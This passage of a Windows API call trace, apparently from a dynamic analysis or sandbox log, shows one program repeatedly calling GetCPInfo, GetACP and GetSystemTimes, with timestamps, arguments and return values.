out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.153] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.153] GetACP () returned 0x4e4 [0129.153] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.154] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.154] GetACP () returned 0x4e4 [0129.154] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.155] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.155] GetACP () returned 0x4e4 [0129.155] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.156] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.156] GetACP () returned 0x4e4 [0129.156] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.156] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.156] GetACP () returned 0x4e4 [0129.156] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.156] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.156] GetACP () returned 0x4e4 [0129.156] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.157] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.157] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.157] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.157] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.157] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.157] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.157] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.157] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.158] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.158] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.158] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.159] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.159] GetACP () returned 0x4e4 [0129.159] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.160] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.160] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.160] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.160] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.160] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.160] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.160] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.160] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.161] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.161] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.161] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.162] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.162] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.162] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.163] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.163] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.163] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.164] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.164] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.164] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.164] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0129.164] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0129.164] GetACP () returned 0x4e4 [0129.164] GetSystemTimes (in: 